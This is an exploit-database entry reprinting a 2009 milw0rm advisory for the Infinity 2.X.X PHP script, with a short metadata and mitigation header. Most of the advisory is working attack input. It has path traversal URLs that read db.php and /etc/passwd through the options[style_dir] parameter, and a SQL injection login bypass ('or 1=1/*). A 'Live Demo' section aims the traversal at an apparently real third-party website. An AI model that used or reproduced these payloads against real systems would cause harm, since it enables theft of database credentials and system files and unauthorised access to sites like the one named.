Infinity - exploit.company

vendor:

Infinity

by:

SwEET-DeViL

7,5

CVSS

HIGH

Local File Disclosure / Auth Bypass

200

CWE

Product Name: Infinity

Affected Version From: 2.X.X

Affected Version To: 2.X.X

Patch Exists: NO

Related CWE: N/A

CPE: a:dimofinf:infinity

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2009

Infinity <= v2.X.X Local File Disclosure / Auth Bypass Vulnerabilities

Infinity version 2.X.X is vulnerable to Local File Disclosure and Authentication Bypass. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious parameters to the vulnerable application. This will allow the attacker to access sensitive information from the server and bypass authentication.

Mitigation:

Ensure that the application is not vulnerable to Local File Disclosure and Authentication Bypass. Ensure that all user input is properly sanitized and validated.

Source

Exploit-DB raw data:

------------------Infinity <= v2.X.X  Local File Disclosure / Auth Bypass Vulnerabilities-------------------------
   #     ####     #     ###      ##   ###  ####  ####  ###   ## ###   ####  ####   ###     #    ### ####  ######
   ##     #  #    ##     # #    # #  #  #   # #   #  #  #    #   #   #    #  # #  #  #     ##    #   # # #  #  #
   # #    #  #    # #    # #    # #  #      #     #  #   #   #   #  #        #    #        # #   #   #      #  
  #  #    ###    #  #    ###   #  #   ##    ###   ###    #  #    #  #        ###   ##      #  #  #   ###    #  
  ####    #  #   ####    #  # ######    #   #     #  #    # #    #  #        #       #     #   # #   #      #  
 #   #    #   # #   #    #  #     # #   #   #     #   #   ##     #   #    #  #   #   #     #    ##   #      #  
##    ## ###   ##    ## ####     ### ###   ####  ###   #   #    ###   ####  ####  ###   # ###    #  ####   ###
    
#----------------------------------------------------------------------------------------------------------------
Script : Infinity
version : 2.X.X
Language: PHP
Site: http://www.dimofinf.net/
Author: SwEET-DeViL

need magic_quotes_gpc = Off  <-----(<>

----------------------------------------------------------------------------------------------------------------

- +[LFD]

#Exploit:

http://WWW.Site.Com/inf/?options[style_dir]=../include/db.php%00
http://WWW.Site.Com/inf/?options[style_dir]=../../../../../../etc/passwd%00
#
###
#
#----------------------------------------------------------------------------------------------------------------
- +[AB]

http://WWW.Site.Com/inf/cp


#Exploit:


username : 'or 1=1/*

password : SwEET-DeViL

#----------------------------------------------------------------------------------------------------------------
#
###
#
- - +[Live Demo] : >

http://www.alihammadi.com/html/?options[style_dir]=../include/db.php%00
http://www.alihammadi.com/html/?options[style_dir]=../../../../../../etc/named.conf%00


/-------------www.arab4services.net-----------------\
|+------------------------------------------------+ |
||          SwEET-DeViL & viP HaCkEr              | |
||            gamr-14(at)hotmail.com              | |
|+------------------------------------------------+ |
\---------------------------------------------------/


# milw0rm.com [2009-08-18]